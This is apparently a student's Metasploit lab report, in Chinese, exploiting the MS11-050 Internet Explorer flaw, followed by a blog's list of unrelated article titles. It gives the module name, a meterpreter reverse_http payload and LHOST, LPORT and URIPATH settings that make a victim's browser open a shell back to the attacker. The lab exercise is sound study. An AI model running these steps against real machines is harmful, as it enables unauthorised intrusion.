20145333茹翔 Exp5 MS11_050

实验过程

  • 使用命令msfconsole命令进入控制台

  • 使用命令search ms11_050查看针对MS11_050漏洞的攻击模块

  • 确定相应模块名之后,我们使用该模块。使用命令 use exploit/windows/browser/ms11_050_mshtml_cobjectelement进入模块

  • 使用命令info查看该模块的具体信息

  • 设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。使用命令set payloads windows/meterpreter/reverse_http

  • 使用show options 查看具体参数设置

  • 设置其相关参数

      set LHOST 192.168.31.177
    set LPORT 5333
    set URIPATH 20145333RX
  • 使用命令exploit攻击,等待连接,漏洞主机访问该ip,被攻击主机打开病毒网址效果为:

最新文章

  1. 将 instance 连接到 first_local_net - 每天5分钟玩转 OpenStack(82)
  2. graph | hungary
  3. HDU-4527 小明系列故事——玩转十滴水 模拟
  4. 努力学习 HTML5 (1)—— 初体验
  5. jQuery文档加载完毕的几种写法
  6. css text-overflow溢出文本显示省略号
  7. python多重继承:
  8. Java---设计模块(单例的变形)(多例)
  9. python数据库做成邮箱的注册系统!
  10. 如何实现Web聊天
  11. HTML框架集之Frameset与Iframe简单应用
  12. oracle递归查询子节点
  13. JQuery中$.ajax()方法参数详解 (20
  14. PageRank在Hadoop和spark下的实现以及对比
  15. JUI/DWZ介绍、简单使用
  16. QT中对内存的管理
  17. MySQL分组、链接的使用
  18. portscaner 多线程、多协程并发端口扫描
  19. Mac 日常使用tips
  20. C#.NET中遍历指定目录下的文件(及所有子目录及子目录里更深层目录里的文件)

热门文章

  1. POJ_2019_Cornfields
  2. CodeForces - 847B Preparing for Merge Sort 二分
  3. HTML 标签大全及属性
  4. UITableView左右滑动cell无法显示“删除”按钮的原因分析
  5. Core Data with Mantle
  6. Redis的五种数据结构的内部编码
  7. PAT Waiting in Line[转载]
  8. 松下 激光位移传感器 API
  9. 你真的了解[super ]关键字吗?
  10. Centos下添加PHP对MSSQL的支持